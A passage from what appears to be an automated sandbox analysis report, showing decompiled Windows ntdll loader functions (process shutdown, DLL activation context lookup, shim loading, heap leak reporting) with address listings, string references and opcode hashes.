						E1D75DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E1D76D886();
					}
					goto L8;
				}
				_t119 =  *0x1d835b24; // 0x1ab2b50
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E1D75DC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x1d835b24; // 0x1ab2b50
					E1D75F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E1D76D88F();
				}
				goto L15;
			}


























                                                                                                                              0x1d76d6d0
                                                                                                                              0x1d76d6d2
                                                                                                                              0x1d76d6d7
                                                                                                                              0x1d76d6dc
                                                                                                                              0x1d76d6e3
                                                                                                                              0x1d76d6ed
                                                                                                                              0x1d76d810
                                                                                                                              0x1d76d813
                                                                                                                              0x1d76d81f
                                                                                                                              0x1d76d81f
                                                                                                                              0x1d76d6f3
                                                                                                                              0x1d76d6f9
                                                                                                                              0x1d76d6fc
                                                                                                                              0x1d76d6ff
                                                                                                                              0x1d76d702
                                                                                                                              0x1d76d709
                                                                                                                              0x1d7af0c2
                                                                                                                              0x1d7af0c2
                                                                                                                              0x1d76d716
                                                                                                                              0x1d7af0cd
                                                                                                                              0x1d7af0e7
                                                                                                                              0x1d7af0ec
                                                                                                                              0x1d7af0ec
                                                                                                                              0x1d76d71c
                                                                                                                              0x1d76d71f
                                                                                                                              0x1d76d724
                                                                                                                              0x1d76d732
                                                                                                                              0x1d76d86d
                                                                                                                              0x1d76d873
                                                                                                                              0x1d76d875
                                                                                                                              0x1d76d877
                                                                                                                              0x1d76d879
                                                                                                                              0x1d76d87f
                                                                                                                              0x1d76d87f
                                                                                                                              0x1d76d738
                                                                                                                              0x1d76d740
                                                                                                                              0x1d76d742
                                                                                                                              0x1d76d744
                                                                                                                              0x1d76d744
                                                                                                                              0x1d76d750
                                                                                                                              0x1d7af0f4
                                                                                                                              0x1d7af0f7
                                                                                                                              0x1d7af0fe
                                                                                                                              0x1d7af101
                                                                                                                              0x1d7af108
                                                                                                                              0x1d7af10b
                                                                                                                              0x1d7af10d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af113
                                                                                                                              0x1d7af117
                                                                                                                              0x1d76d7ed
                                                                                                                              0x1d76d7ed
                                                                                                                              0x1d76d7f3
                                                                                                                              0x1d76d7fa
                                                                                                                              0x1d7af13c
                                                                                                                              0x1d7af13f
                                                                                                                              0x1d7af145
                                                                                                                              0x1d7af14a
                                                                                                                              0x1d7af14a
                                                                                                                              0x1d7af13f
                                                                                                                              0x1d76d800
                                                                                                                              0x1d76d804
                                                                                                                              0x1d76d806
                                                                                                                              0x1d76d806
                                                                                                                              0x1d76d80b
                                                                                                                              0x00000000
                                                                                                                              0x1d76d80b
                                                                                                                              0x1d76d756
                                                                                                                              0x1d76d756
                                                                                                                              0x1d76d75a
                                                                                                                              0x1d76d75d
                                                                                                                              0x1d76d766
                                                                                                                              0x1d76d76c
                                                                                                                              0x1d76d76e
                                                                                                                              0x1d76d76e
                                                                                                                              0x1d76d771
                                                                                                                              0x1d76d774
                                                                                                                              0x1d76d774
                                                                                                                              0x1d76d777
                                                                                                                              0x1d76d77a
                                                                                                                              0x1d76d77a
                                                                                                                              0x1d76d77d
                                                                                                                              0x1d76d782
                                                                                                                              0x1d76d78d
                                                                                                                              0x1d76d794
                                                                                                                              0x1d76d799
                                                                                                                              0x1d76d79f
                                                                                                                              0x1d76d79f
                                                                                                                              0x1d76d7a1
                                                                                                                              0x1d76d7a7
                                                                                                                              0x1d76d7ac
                                                                                                                              0x1d76d7af
                                                                                                                              0x1d76d7b2
                                                                                                                              0x1d76d7b6
                                                                                                                              0x1d76d7da
                                                                                                                              0x1d76d7da
                                                                                                                              0x1d76d7b8
                                                                                                                              0x1d76d7b9
                                                                                                                              0x1d76d7c0
                                                                                                                              0x1d76d7c5
                                                                                                                              0x1d76d7cc
                                                                                                                              0x1d76d7cf
                                                                                                                              0x1d76d7cf
                                                                                                                              0x00000000
                                                                                                                              0x1d76d782
                                                                                                                              0x1d76d7e1
                                                                                                                              0x1d76d7e7
                                                                                                                              0x1d76d7eb
                                                                                                                              0x1d76d820
                                                                                                                              0x1d76d827
                                                                                                                              0x1d76d82c
                                                                                                                              0x1d76d832
                                                                                                                              0x1d76d834
                                                                                                                              0x1d76d83a
                                                                                                                              0x1d76d83f
                                                                                                                              0x1d76d842
                                                                                                                              0x1d76d84a
                                                                                                                              0x1d76d84f
                                                                                                                              0x1d76d856
                                                                                                                              0x1d76d856
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 1D76D879
                                                                                                                                • Part of subcall function 1D744779: RtlDebugPrintTimes.NTDLL ref: 1D744817
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 3446177414-1975516107
                                                                                                                              • Opcode ID: 46f5d26a174d8acb8852af6776e9d1efed9ea882986113024ff3aa012cc29539
                                                                                                                              • Instruction ID: f215a540a1cbd2fbe8a8654a56a4bbe23fe014f929f99014cbf7963a9f2d3518
                                                                                                                              • Opcode Fuzzy Hash: 46f5d26a174d8acb8852af6776e9d1efed9ea882986113024ff3aa012cc29539
                                                                                                                              • Instruction Fuzzy Hash: 6B513875E04296DFEB05CF68C48879DBBB1BF48324F15815AD9046B291E770E982CBE3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7EECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • HEAP: , xrefs: 1D7EECDD
                                                                                                                              • ---------------------------------------, xrefs: 1D7EEDF9
                                                                                                                              • Entry Heap Size , xrefs: 1D7EEDED
                                                                                                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1D7EEDE3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                              • API String ID: 3446177414-1102453626
                                                                                                                              • Opcode ID: 4df4cc4519a6cc73872bbdfc956f0b7661133c653c4b758759fd3192093a8111
                                                                                                                              • Instruction ID: 8af381584a5a7cb553a1e5ae97054aed01fed0fda18dc5c8272cc8e1c003d55a
                                                                                                                              • Opcode Fuzzy Hash: 4df4cc4519a6cc73872bbdfc956f0b7661133c653c4b758759fd3192093a8111
                                                                                                                              • Instruction Fuzzy Hash: AF418079A00226EFC705CF1DC484A697BB5FF493A47168D6AD4089B222D731EC41CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D749046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E1D749046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x1d81be98);
				E1D797C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E1D788F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E1D759870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x1d8365e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E1D75A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E1D765A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E1D7604C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x1d8365e0; // 0x76d8a680
							 *0x1d8391e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x1d8365e8;
									if(_t148 != 0) {
										 *0x1d8391e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E1D75DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E1D753B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E1D759870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E1D7A247B();
									goto L26;
								} else {
									_t152 = E1D75A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E1D7604C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                                                                                              0x1d749046
                                                                                                                              0x1d749046
                                                                                                                              0x1d74904b
                                                                                                                              0x1d749050
                                                                                                                              0x1d749055
                                                                                                                              0x1d74905b
                                                                                                                              0x1d74905d
                                                                                                                              0x1d749066
                                                                                                                              0x1d74906f
                                                                                                                              0x1d749078
                                                                                                                              0x1d749080
                                                                                                                              0x1d749088
                                                                                                                              0x1d74908f
                                                                                                                              0x1d749095
                                                                                                                              0x1d7490a9
                                                                                                                              0x1d7490b1
                                                                                                                              0x1d7490be
                                                                                                                              0x1d7490c6
                                                                                                                              0x1d7490cf
                                                                                                                              0x1d7490e2
                                                                                                                              0x1d7490f7
                                                                                                                              0x1d7490fb
                                                                                                                              0x1d749118
                                                                                                                              0x00000000
                                                                                                                              0x1d749123
                                                                                                                              0x1d74913b
                                                                                                                              0x1d74913f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d749147
                                                                                                                              0x1d7a231f
                                                                                                                              0x1d7a231f
                                                                                                                              0x00000000
                                                                                                                              0x1d7a231f
                                                                                                                              0x1d749154
                                                                                                                              0x1d7a2330
                                                                                                                              0x1d7a2336
                                                                                                                              0x1d7a2336
                                                                                                                              0x1d74915a
                                                                                                                              0x1d74915a
                                                                                                                              0x1d74915a
                                                                                                                              0x1d749161
                                                                                                                              0x1d749167
                                                                                                                              0x1d74916b
                                                                                                                              0x1d749172
                                                                                                                              0x1d749182
                                                                                                                              0x1d74918e
                                                                                                                              0x1d749199
                                                                                                                              0x1d7491ba
                                                                                                                              0x1d7491be
                                                                                                                              0x00000000
                                                                                                                              0x1d7491e0
                                                                                                                              0x1d7a2358
                                                                                                                              0x1d7a2360
                                                                                                                              0x1d7a2368
                                                                                                                              0x1d7a236a
                                                                                                                              0x1d7a2372
                                                                                                                              0x00000000
                                                                                                                              0x1d7a2378
                                                                                                                              0x1d7a2378
                                                                                                                              0x1d7a2381
                                                                                                                              0x1d7a2458
                                                                                                                              0x1d7a2458
                                                                                                                              0x1d7a245b
                                                                                                                              0x1d7a2463
                                                                                                                              0x1d7a2468
                                                                                                                              0x1d7a246e
                                                                                                                              0x1d7a246e
                                                                                                                              0x1d7a24a7
                                                                                                                              0x00000000
                                                                                                                              0x1d7a24a7
                                                                                                                              0x1d7a238f
                                                                                                                              0x1d7a2396
                                                                                                                              0x1d7a239c
                                                                                                                              0x1d7a239f
                                                                                                                              0x1d7a239f
                                                                                                                              0x1d7a23bb
                                                                                                                              0x1d7a23c8
                                                                                                                              0x1d7a23ca
                                                                                                                              0x1d7a23d2
                                                                                                                              0x1d7a244c
                                                                                                                              0x1d7a244c
                                                                                                                              0x1d7a2453
                                                                                                                              0x00000000
                                                                                                                              0x1d7a23d4
                                                                                                                              0x1d7a23e7
                                                                                                                              0x1d7a23e9
                                                                                                                              0x1d7a23f1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a23f9
                                                                                                                              0x1d7a2402
                                                                                                                              0x1d7a2408
                                                                                                                              0x1d7a240c
                                                                                                                              0x1d7a2413
                                                                                                                              0x1d7a2423
                                                                                                                              0x1d7a243f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a2441
                                                                                                                              0x1d7a2446
                                                                                                                              0x1d7a2446
                                                                                                                              0x00000000
                                                                                                                              0x1d7a2446
                                                                                                                              0x1d7a23fb
                                                                                                                              0x00000000
                                                                                                                              0x1d7a23fb
                                                                                                                              0x1d7a23d2
                                                                                                                              0x00000000
                                                                                                                              0x1d7a2372
                                                                                                                              0x1d7491be
                                                                                                                              0x1d749118
                                                                                                                              0x1d7490fd
                                                                                                                              0x1d749102
                                                                                                                              0x1d74910e

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 3446177414-1194432280
                                                                                                                              • Opcode ID: ca7b1a49301ca834c925ff972d097ebdf1939138ecf07611416faa6c00a16f74
                                                                                                                              • Instruction ID: 90166b1d70bc54a084d29139a0bb69bbb52e76d33dbf90b65b69af929702d444
                                                                                                                              • Opcode Fuzzy Hash: ca7b1a49301ca834c925ff972d097ebdf1939138ecf07611416faa6c00a16f74
                                                                                                                              • Instruction Fuzzy Hash: 37813F75D002799BDB21CF54CC85BEEB6B4AF09720F1581EAE909B7250E7709E84CF62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D774C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 41%
                                                                                                                              			E1D774C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x1d8365e4; // 0x76d6f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x1d835b24; // 0x1ab2b50
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x1d8365e4; // 0x76d6f0e0
					 *0x1d8391e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E1D7426A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x1d8337c0 & 0x00000003) != 0) {
								E1D7BE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x1d8337c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1d8337c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E1D7BE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}















                                                                                                                              0x1d774c42
                                                                                                                              0x1d774c47
                                                                                                                              0x1d774c4a
                                                                                                                              0x1d774c4c
                                                                                                                              0x1d774c52
                                                                                                                              0x1d774cb8
                                                                                                                              0x1d774cbe
                                                                                                                              0x1d774cbe
                                                                                                                              0x1d774c5a
                                                                                                                              0x1d774c5d
                                                                                                                              0x1d774c69
                                                                                                                              0x1d774c6f
                                                                                                                              0x1d774c74
                                                                                                                              0x1d774cd6
                                                                                                                              0x1d774cda
                                                                                                                              0x1d7b33b9
                                                                                                                              0x1d7b33be
                                                                                                                              0x1d7b33f7
                                                                                                                              0x1d7b33f7
                                                                                                                              0x1d7b33be
                                                                                                                              0x1d774cda
                                                                                                                              0x1d774c76
                                                                                                                              0x1d774c84
                                                                                                                              0x1d774c8c
                                                                                                                              0x1d774c90
                                                                                                                              0x1d774ca9
                                                                                                                              0x1d774ca9
                                                                                                                              0x1d774cae
                                                                                                                              0x1d774ce4
                                                                                                                              0x1d774cee
                                                                                                                              0x1d774cf3
                                                                                                                              0x1d774cf3
                                                                                                                              0x1d774ce6
                                                                                                                              0x1d774ce6
                                                                                                                              0x1d774cb2
                                                                                                                              0x1d7b3463
                                                                                                                              0x1d7b347b
                                                                                                                              0x1d7b3480
                                                                                                                              0x1d7b348a
                                                                                                                              0x1d7b3490
                                                                                                                              0x1d7b3490
                                                                                                                              0x1d7b348a
                                                                                                                              0x00000000
                                                                                                                              0x1d774cb2
                                                                                                                              0x1d774c98
                                                                                                                              0x1d774cc5
                                                                                                                              0x1d7b3429
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b342f
                                                                                                                              0x1d774cc5
                                                                                                                              0x1d774ca1
                                                                                                                              0x1d7b3434
                                                                                                                              0x1d7b3435
                                                                                                                              0x1d7b344f
                                                                                                                              0x1d7b3454
                                                                                                                              0x1d7b3454
                                                                                                                              0x1d774ca7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 1D7B3466
                                                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 1D7B344A, 1D7B3476
                                                                                                                              • LdrpFindDllActivationContext, xrefs: 1D7B3440, 1D7B346C
                                                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1D7B3439
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                              • API String ID: 3446177414-3779518884
                                                                                                                              • Opcode ID: ca4e5d7cd8001d208e23112ce00e805174baf744e25dba8b6ed3e460afebcd08
                                                                                                                              • Instruction ID: f0db24ac003bd8dba8382c84ea83f2cd3c5e76c4001897043f66fe4c23ad7d68
                                                                                                                              • Opcode Fuzzy Hash: ca4e5d7cd8001d208e23112ce00e805174baf744e25dba8b6ed3e460afebcd08
                                                                                                                              • Instruction Fuzzy Hash: 6D31D572E002A2AFDF129B048C8DB7AB3A4BB057BCF46C96BD84857151E7609C80C693
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 35%
                                                                                                                              			E1D76237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x1d8338b8; // 0x1
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x1d8368d8; // 0x0
						if(_t22 != 0) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x1d8368d8 = _t50;
							 *0x1d835d4c = _t50;
						}
					}
					 *0x1d8338b8 = _t38;
					return _t55;
				}
				_t59 =  *0x1d8368d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x1d8338b8 = 0;
					_t55 = E1D7C1BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x1d8368d8; // 0x0
						while( *_t51 != 0) {
							 *0x1d8391e0(_t51, 0, 1, 1, 0, 1, 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x1d839218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E1D74FED0(0x1d8332d8);
						if( *0x1d8365f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E1D736704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x1d8332d8);
						E1D74E740(_t46);
						goto L21;
					}
					_t36 =  *0x1d8337c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E1D7BE692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x1d8337c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}




















                                                                                                                              0x1d762383
                                                                                                                              0x1d76238b
                                                                                                                              0x1d76238d
                                                                                                                              0x1d762390
                                                                                                                              0x1d762393
                                                                                                                              0x1d762397
                                                                                                                              0x1d7623a5
                                                                                                                              0x1d7623a8
                                                                                                                              0x1d7623aa
                                                                                                                              0x1d7623b1
                                                                                                                              0x1d7aa878
                                                                                                                              0x1d7aa87d
                                                                                                                              0x1d7aa883
                                                                                                                              0x1d7aa883
                                                                                                                              0x1d7623b1
                                                                                                                              0x1d7623ba
                                                                                                                              0x1d7623c3
                                                                                                                              0x1d7623c3
                                                                                                                              0x1d762399
                                                                                                                              0x1d76239f
                                                                                                                              0x1d7aa784
                                                                                                                              0x1d7aa78f
                                                                                                                              0x1d7aa793
                                                                                                                              0x1d7aa7cd
                                                                                                                              0x1d7aa80b
                                                                                                                              0x1d7aa7e3
                                                                                                                              0x1d7aa7e9
                                                                                                                              0x1d7aa7ee
                                                                                                                              0x1d7aa866
                                                                                                                              0x1d7aa85f
                                                                                                                              0x1d7aa85f
